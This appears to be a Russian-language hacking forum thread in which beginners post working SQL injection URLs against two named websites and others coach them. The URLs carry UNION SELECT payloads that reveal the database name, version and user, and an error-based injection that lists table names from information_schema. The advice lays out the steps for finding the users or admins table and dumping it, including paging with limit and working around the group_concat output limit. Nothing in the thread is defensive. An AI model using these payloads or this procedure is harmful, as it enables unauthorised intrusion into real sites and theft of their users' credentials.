http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/ везде подставляю version() и не чего не выводит? Почему?
http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/ узнал я database() - expert_poisk version() - 5.0.77 user() - expert_poisk@localhost дальеше что делать надо?
дальше вытащи имена таблиц,найдешь интересную таблицу(в смысле таблица узеров или админов) узнай колонки таблицы,а потом select из таблицы.. понял?
А есть ФАК более менее понятный для новичка! понял что из базы expert_poisk надо вытащить users! только как? http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,users,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+expert_poisk/**/ Пишет: Table 'expert_poisk.expert_poisk' doesn't exist
Да, но в ней нет юзеров. Делай так: Потом: limit+2,1; limit+3,1 и т.д., пока не найдешь то что тебе нужно. Или можно так: Не забываем про то, что функции group_concat по дефолту ограничение - 1024 символа на вывод.
http://www.rokk.ru/index.php?cat=50&item=-21%20or%20(select%20count(*)from(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid((select%20table_name%20from%20information_schema.tables%20limit%2019,1),1,20),floor(rand(0)*2))) SESSION_STATUS1 тут что такое 1 ?? как убрать ?
Зачем убирать? Просто не учитывать. А появляется из-за floor(rand(0)*2) поставь floor(rand(0)*100) - будут другие циферьки
